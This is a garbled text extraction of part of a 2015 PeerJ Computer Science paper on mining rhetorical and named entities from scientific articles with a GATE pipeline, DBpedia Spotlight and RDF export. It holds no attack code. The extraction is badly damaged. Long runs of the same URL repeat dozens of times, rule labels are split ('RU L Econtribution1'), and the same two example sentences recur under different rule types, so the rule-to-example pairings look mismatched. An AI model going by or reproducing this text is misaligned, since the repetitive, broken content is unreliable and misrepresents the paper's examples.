http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://dx.doi.org/10.7717/peerj-cs.37 RULEdeictic1 : D + N Pgazetteer (1) “This paper presents a use case of adding value to a bird observation dataset by related weather data. . . ”(sepublica2014 paper02) RU L Edeictic2 : A + P (2) “Here, we demonstrate how our interpretation of NPs, named graphs, knowledge resources. . . ”(sepublica2011 paper02) Based on the detected deictic phrases, we annotate metadiscourse phrases in a sentence, like the following examples that are based on verbs from our gazetteer of rhetorical verbs: RU L Emetadiscourse1 : D P + Vpresentation (3) “This paper presents a use case of adding value to a bird observation dataset by related weather data. . . ”(sepublica2014 paper02) RU L Emetadiscourse2 : D P + P + Vpresentation (4) “Here, we demonstrate how our interpretation of NPs, named graphs, knowledge resources. . . ”(sepublica2011 paper02) Contributions We designed hand-crafted rules to extract Contribution sentences by finding grammatical structures often observed in scientific argumentation to describe authors’ contributions. The rules look at sequences of deictic phrases, metadiscourse mentions, the rhetorical function of the verbs mentioned in the sentence and the adjacent noun phrases to classify a sentence as a Contribution, like the following example (matching string is in bold): RU L Econtribution1 : M + N P (5) “This paper presents a use case of adding value to a bird observation dataset by related weather data. . . ”(sepublica2014 paper02) RU L Econtribution2 : M + A + N P (6) “Here, we demonstrate how our interpretation of NPs, named graphs, knowledge resources. . . ”(sepublica2011 paper02) Claims The extraction of Claim entities is done similar to the Contribution annotations and performed based on deictic phrases detected in a text. However, here we require that the deictic phrases in Claim sentences explicitly refer to the authors’ contributions presented in the paper. Hence, we distinguish Claims from other classes in the way that the sentence containing the deictic phrase must (i) be a statement in form of a factual implication, and (ii) have a comparative voice or asserts a property of the author’s contribution, like novelty or performance: Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 10/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.37 RU L Eclaim1 : M + D + A + D C T (7) “We built the first BauDenkMalNetz prototype using SMW [DLK+10].”(sepublica2011 paper04) RU L Eclaim2 : D P + V + D C T (8) “Our approach is compatible with the principles of nanopublications.”(sepublica2012 paper02) Automatic detection of named entities Using the rules described above, we can now find and classify REs in a scientific document. However, by using REs alone, a system is still not able to understand the topics being discussed in a document; for example, to generate a topic-focused summary. Therefore, the next step towards constructing a knowledge base of scientific literature is detecting the named entities that appear in a document. Our hypothesis here is that the extraction of named entities provides the means to represent the main topics being discussed in a paper. Therefore, the detection of the presence of such entities, along with linguistic constituents of the RE fragments, will help towards understanding the meaning of an article’s content and position of its authors regarding the detected entities, e.g., ‘enhancing algorithm A’ or ‘applying method M.’ Since the recognition of NEs varies by the functions of the field (e.g., biological terms vs. software methodologies), in lieu of developing multiple, domain-specific NER tools, we intend to reuse the LOD cloud as a structured, continually updated source of structured knowledge, by linking the surface forms of terms in a document to their corresponding resources in the LOD cloud. To further test this hypothesis, we selected the DBpedia Spotlight annotation tool described in Section ‘Named entity linking’ to automate the entity recognition task. Our goal here is to annotate the full-text of a document and then map the detected entities to the original document using the text offsets provided by Spotlight. Since we are solely interested in the named entities, we will discard any tagged entity that does not fall within a noun phrase chunk. This way, adverbs or adjectives like “here” or “successful” are filtered out and phrases like “service-oriented architecture” can be extracted as a single entity. Semantic representation of entities In order to transform the detected rhetorical and named entities into an interoperable and machine-understandable data structure that can be added to a semantic knowledge base, we chose to represent the extracted entities described above, as well as other metadata about each document, using the W3C standard RDF format. Therefore, each document will become a subject of a triple and all the detected entities will be attached to the document instance using custom predicates. Each entity may itself be the subject of other triples describing its semantic types and other properties, hence, creating a flexible, scalable graph of the knowledge mined from the document. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 11/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.37 Table 1 Vocabularies used in our semantic model. The table shows the list of shared linked open vocabularies that we use to model the detected entities from scientific literature, as well as their inter- relationships. Prefix Vocabulary URI pubo PUBlication Ontology <http://lod.semanticsoftware.info/pubo/pubo#> doco Document Components Ontology <http://purl.org/spar/doco> sro SALT Rhetorical Ontology <http://salt.semanticauthoring.org/ontologies/sro#> rdf W3C RDF <http://www.w3.org/1999/02/22-rdf-syntax-ns#> rdfs W3C RDF Schema <http://www.w3.org/2000/01/rdf-schema#> cnt W3C Content Ontology <http://www.w3.org/2011/content#> dbpedia DBpedia Ontology <http://dbpedia.org/resource/> Vocabularies As discussed in Section ‘Document markup vocabularies’, we try to reuse the existing linked open vocabularies for modeling the documents and the extracted knowledge, following the best practices for producing linked open datasets (Best Practices for Pub- lishing Linked Data, http://www.w3.org/TR/ld-bp/). Therefore, we developed a vocabulary for scientific literature constructs partly by using existing shared vocabularies (Table 1). We chose to reuse the DoCO vocabulary for the semantic description of a document’s structure, since it covers both structural and rhetorical entities of a document through integrating the DEO (Discourse Elements Ontology, http://purl.org/spar/deo) and SALT Rhetorical Ontologies. Therefore, by using DoCO, we can describe both the structure of documents (e.g., Abstract, Title), as well as various REs types (e.g., Contributions). We also developed our own vocabulary to describe the relations between a doc- ument and its contained entities. Our PUBlication Ontology (PUBlication Ontology (PUBO), http://lod.semanticsoftware.info/pubo/pubo.rdf) uses “pubo” as its namespace throughout this paper, and models REs as the subset of document’s sentences with a specific type, which may in turn contain a list of topics, i.e., named entities with URIs linked to their LOD resources. Figure 7 shows example RDF triples using our publication model and other shared semantic web vocabularies. The most similar vocabulary to our PUBO vocabulary would have been the Open Annotation (OA)6 format, where each detected entity is described with a body and a 6 Open Annotation Model, http://www. w3.org/ns/oa target element. The former would create a URI representing the annotation (and some provenance information) and the latter provides information like the source document URL and text offsets. The generated body and target instances are then connected together using custom OA predicates. Using the OA data model, however, would lead to a ‘triple bloat’7 situation, increasing the size of knowledge base by a factor of 3–4. Moreover, the 7 Triple bloat refers to a situation where multiple triples are required to convey one fact. OA data model lacks an explicit representation of embedded annotations, such as the description of named entities contained within a rhetorical entity, which would require more complex and time-consuming queries to extract these facts from a knowledge base. The entity export process While the type of the extracted entities are decided by the rules described in ‘Automatic detection of rhetorical entities’, ideally, we still would like to have the flexibility to express Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 12/27 https://peerj.com/computer-science/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://www.w3.org/TR/ld-bp/ http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://www.w3.org/ns/oa http://dx.doi.org/10.7717/peerj-cs.37 Figure 3 The figure shows the sequence of processing resources of our text mining pipeline that runs on a document’s text, producing various annotations, which are finally exported into a knowledge base. the mapping of annotations to RDF triples and their inter-relations at runtime. This way, various representations of knowledge extracted from documents can be constructed based on the intended use case and customized without affecting the underlying syntactic and semantic processing components. We designed an LOD exporter component that transforms annotations in a document to RDF triples. The transformation is conducted according to a series of mapping rules. The mapping rules describe (i) the annotation type in the document and its corresponding semantic type, (ii) the annotation’s features and their corresponding semantic type, and (iii) the relations between exported triples and the type of their relation. Given the mapping rules, the exporter component then iterates over a document’s entities and exports each designated annotation as the subject of a triple, with a custom predicate and its attributes, such as its features, as the object. Table 1 summarizes the shared vocabularies that we use in the annotation export process. IMPLEMENTATION We implemented the NLP pipeline described in the ‘Design’ section based on the General Architecture for Text Engineering (GATE) (Cunningham et al., 2011),8 a robust, 8 GATE, http://gate.ac.uk open-source framework for developing language engineering applications. Our pipeline is composed of several Processing Resources (PRs) that run sequentially on a given document, as shown in Fig. 3. Each processing resource can generate a new annotation or add a new feature to the annotations from upstream processing resources. In this section, we provide the implementation details of each of our pipeline’s components. Note that the materials described in this section can be found at http://www.semanticsoftware.info/ semantic-scientific-literature-peerj-2015-supplements. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 13/27 https://peerj.com/computer-science/ http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://dx.doi.org/10.7717/peerj-cs.37 Pre-processing the input documents We use GATE’s ANNIE plugin (Cunningham et al., 2002), which offers readily available pre-processing resources to break down a document’s text into smaller units adequate for the pattern-matching rules. Specifically, we use the following processing resources provided by GATE’s ANNIE and Tools plugins: Document Reset PR removes any existing annotations (e.g., from previous runs of the pipeline) from a document; ANNIE English Tokeniser breaks the stream of a document’s text into tokens, classified as words, numbers or symbols; RegEx Sentence Splitter uses regular expressions to detect the boundary of sentences in a document; ANNIE POS Tagger adds a POS tag to each token as a new feature; and GATE Morphological analyser adds the root form of each token as a new feature. The pre-processed text is then passed onto the downstream processing resources. Rhetector: automatic detection of rhetorical entities We developed Rhetector (http://www.semanticsoftware.info/rhetector) as a stand-alone GATE plugin to extract rhetorical entities from scientific literature. Rhetector has several processing resources: (i) the Rhetorical Entity Gazetteer PR that produces Lookup annotations by comparing the text tokens against its dictionary lists (domain concepts, rhetorical verbs, etc.) with the help of the Flexible Gazetteer, which looks at the root form of each token; and (ii) the Rhetorical Entity Transducer, which applies the rules described in Section ‘Automatic detection of rhetorical entities’ to sequences of Tokens and their Lookup annotations to detect rhetorical entities. The rules are implemented using GATE’s JAPE (Cunningham et al., 2011) language that provides regular expressions over document annotations, by internally compiling the rules into finite-state transducers. Every JAPE rule has a left-hand side that defines a pattern, which is matched against the text, and produces the annotation type declared on the right-hand side. Additional information are stored as features of annotations. A sequence of JAPE rules for extracting a Contribution sentence containing a metadiscourse is shown in Fig. 4. LODtagger: named entity detection and grounding using DBpedia spotlight We locally installed the DBpedia Spotlight (http://spotlight.dbpedia.org) tool (Daiber et al., 2013) version 0.79 and used its RESTful annotation service to find and disambiguate 9 With a statistical model for English (en 2+2), http://spotlight.sztaki.hu/ downloads/ named entities in our documents. To integrate the NE detection process in our semantic analysis workflow, we implemented LODtagger (http://www.semanticsoftware.info/ lodtagger), a GATE plugin that acts as a wrapper for the Spotlight tool. The DBpediaTagger PR sends the full text of the document to Spotlight as an HTTP POST request and receives an array of JSON objects as the result, like the example shown in Fig. 5. The DBpediaTagger PR then parses each JSON object and adds a DBpediaLink Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 14/27 https://peerj.com/computer-science/ http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://dx.doi.org/10.7717/peerj-cs.37 Figure 4 The figure above shows JAPE rules (left) that are applied on a document’s text to extract a Contribution sentence. The image on the right shows the generated annotations (Deictic, Metadis- course and RhetoricalEntity), color-coded in GATE’s graphical user interface. Figure 5 The figure above shows a JSON example response from Spotlight (left) and how the detected entity’s offset is used to generate a GATE annotation in the document (right). annotation, with a DBpedia URI as its feature, to the document. To further filter the resulting entities, we align them with noun phrases (NPs), as detected by the MuNPEx NP Chunker for English.10 The aligning is performed using a JAPE rule (DBpedia NE filter 10 Multi-Lingual Noun Phrase Ex- tractor (MuNPEx), http://www. semanticsoftware.info/munpex in Fig. 3), which removes DBpediaLink annotations that are not nouns or noun phrases. Similarly, we discard NEs that include a pronoun only. LODeXporter: knowledge base population We now have REs and NEs detected in the source documents, but they come in a GATE-specific data structure, i.e., GATE Annotations. In order to export them into an interoperable, queryable format, we developed LODeXporter (http://www. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 15/27 https://peerj.com/computer-science/ http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex 